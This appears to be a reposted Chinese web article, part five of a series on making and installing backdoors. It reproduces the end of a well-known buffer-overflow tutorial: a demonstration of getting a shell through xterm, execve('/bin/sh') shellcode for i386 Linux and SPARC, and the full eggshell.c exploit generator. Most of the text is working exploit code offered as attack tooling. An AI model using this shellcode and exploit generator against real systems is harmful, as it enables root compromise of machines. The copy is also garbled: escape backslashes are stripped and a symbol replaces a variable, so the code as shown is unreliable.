最全的后门制作及安装技术 五

　　好,现在我们来试验一下这个程序的效能如何.这次的攻击目标是xterm(所有链接了Xt Library的程序都有此缺陷). 首先确保X Server在运行并且允许本地连
接.
---------------------------------------------

[aleph1]$ export DISPLAY=:0.0

[aleph1]$ ./exploit2 1124

Using address: 0xbffffdb4

[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG

Warning: some arguments in previous message
were lost

bash$

---------------------------------------------
OK! 看来我们的程序确实很好用.如果xterm有suid- root属性,那么这个shell就是一个具有root权限的Shell了.
　
---------------------------------------------
Appendix A - 若干操作系统/平台上的 Shell Code　

i386/Linux

---------------------------------------------
jmp 0x1f

popl %esi

movl %esi,0x8(%esi)

xorl %eax,%eax

movb %eax,0x7(%esi)

movl %eax,0xc(%esi)

movb $0xb,%al

movl %esi,%ebx

leal 0x8(%esi),%ecx

leal 0xc(%esi),%edx

int $0x80

xorl %ebx,%ebx

movl %ebx,%eax

inc %eax

int $0x80

call -0x24

.string "/bin/sh"

---------------------------------------------
---------------------------------

SPARC/Solaris
---------------------------------------------
sethi 0xbd89a, %l6

or %l6, 0x16e, %l6

sethi 0xbdcda, %l7

and %sp, %sp, %o0

add %sp, 8, %o1

xor %o2, %o2, %o2

add %sp, 16, %sp

std %l6, [%sp - 16]

st %sp, [%sp - 8]

st %g0, [%sp - 4]

mov 0x3b, %g1

ta 8

xor %o7, %o7, %o0

mov 1, %g1

ta 8

---------------------------------------------
SPARC/SunOS
---------------------------------------------
sethi 0xbd89a, %l6

or %l6, 0x16e, %l6

sethi 0xbdcda, %l7

and %sp, %sp, %o0

add %sp, 8, %o1

xor %o2, %o2, %o2

add %sp, 16, %sp

std %l6, [%sp - 16]

st %sp, [%sp - 8]

st %g0, [%sp - 4]

mov 0x3b, %g1

mov -0x1, %l5

ta %l5 + 1

xor %o7, %o7, %o0

mov 1, %g1

ta %l5 + 1

---------------------------------------------
Appendix B - 通用 Buffer Overflow 攻击程序
　
shellcode.h
---------------------------------------------

#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE 1

char nop[] = "x90";

char shellcode[] =

"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0
x0b"

"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40
xcd"

"x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {

__asm__("movl %esp,%eax");

}

#elif defined(__sparc__) && defined(__sun__)
&& defined(__svr4__)

#define NOP_SIZE 4

char nop[]="xacx15xa1x6e";

char shellcode[] =

"x2dx0bxd8x9axacx15xa1x6ex2fx0bxdcxdax90x0bx80
x0e"

"x92x03xa0x08x94x1ax80x0ax9cx03xa0x10xecx3bxbf
xf0"

"xdcx23xbfxf8xc0x23xbfxfcx82x10x20x3bx91xd0x20
x08"

"x90x1bxc0x0fx82x10x20x01x91xd0x20x08";

unsigned long get_sp(void) {

__asm__("or %sp, %sp, %i0");

}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE 4

char nop[]="xacx15xa1x6e";

char shellcode[] =

"x2dx0bxd8x9axacx15xa1x6ex2fx0bxdcxdax90x0bx80
x0e"

"x92x03xa0x08x94x1ax80x0ax9cx03xa0x10xecx3bxbf
xf0"

"xdcx23xbfxf8xc0x23xbfxfcx82x10x20x3bxaax10x3f
xff"

"x91xd5x60x01x90x1bxc0x0fx82x10x20x01x91xd5x60
x01";

unsigned long get_sp(void) {

__asm__("or %sp, %sp, %i0");

}

#endif

---------------------------------------------

eggshell.c

---------------------------------------------

/*

* eggshell v1.0

*

* Aleph One / aleph1@underground.org

*/

#include <stdlib.h>

#include <stdio.h>

#include "shellcode.h"

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 512

#define DEFAULT_EGG_SIZE 2048

void usage(void);

void main(int argc, char *argv[]) {

char *ptr, *bof, *egg;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET,
bsize=DEFAULT_BUFFER_SIZE;

int i, n, m, c, align=0,
eggsize=DEFAULT_EGG_SIZE;

while ((c = getopt(argc, argv, "a:b:e:o:")) !=
EOF)

switch © {

case 'a':

align = atoi(optarg);

break;

case 'b':

bsize = atoi(optarg);

break;

case 'e':

eggsize = atoi(optarg);

break;

case 'o':

offset = atoi(optarg);

break;

case '?':

usage();

exit(0);

}

if (strlen(shellcode) > eggsize) {

printf("Shellcode is larger the the egg. ");

exit(0);

}

if (!(bof = malloc(bsize))) {

printf("Can't allocate memory. ");

exit(0);

}

if (!(egg = malloc(eggsize))) {

printf("Can't allocate memory. ");

exit(0);

}

addr = get_sp() - offset;

printf("[ Buffer size: %d Egg size: %d
Aligment: %d ] ",

bsize, eggsize, align);

printf("[ Address: 0x%x Offset: %d ] ", addr,
offset);

addr_ptr = (long *) bof;

for (i = 0; i < bsize; i+=4)

*(addr_ptr++) = addr;

ptr = egg;

for (i = 0; i <= eggsize - strlen(shellcode) -
NOP_SIZE; i += NOP_SIZE)

for (n = 0; n < NOP_SIZE; n++) {

m = (n + align) % NOP_SIZE;

*(ptr++) = nop[m];

}

for (i = 0; i < strlen(shellcode); i++)

*(ptr++) = shellcode[i];

bof[bsize - 1] = '';

egg[eggsize - 1] = '';

memcpy(egg,"EGG=",4);

putenv(egg);

memcpy(bof,"BOF=",4);

putenv(bof);

system("/bin/sh");

}

void usage(void) {

(void)fprintf(stderr,

"usage: eggshell [-a ] [-b ] [-e ] [-o ] ");

}'

游戏外挂设计技术探讨② 上：【上一篇】
最全的后门制作及安装技术 四：【下一篇】